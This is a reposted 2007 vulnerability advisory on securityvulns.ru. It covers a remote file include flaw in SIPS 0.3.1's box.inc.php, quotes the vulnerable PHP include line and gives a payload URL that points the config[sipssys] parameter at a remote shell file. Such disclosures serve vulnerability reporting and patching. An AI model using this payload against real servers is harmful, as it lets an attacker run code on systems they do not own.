Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  phpEventMan v1.0.2 (level) Remote File Include Exploit

  Cerulean Portal System (phpbb_root_path)
Remote File Include Exploit

  Omegaboard v1.0b4 (phpbb_root_path)
Remote File Include Exploit

  Hailboards v1.2.0 (phpbb_root_path)
Remote File Include Exploit

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:01.02.2007
Subject:SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability

*******************************************************************************
# Title   :  SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://sourceforge.net/projects/sips/
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include $config["sipssys"] ."/code/rssparser.inc.php";
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]/sipssys/code/box.inc.php?config[sipssys]=[SHELL]

Example:

/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

[[/RFI]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 



Rating@Mail.ru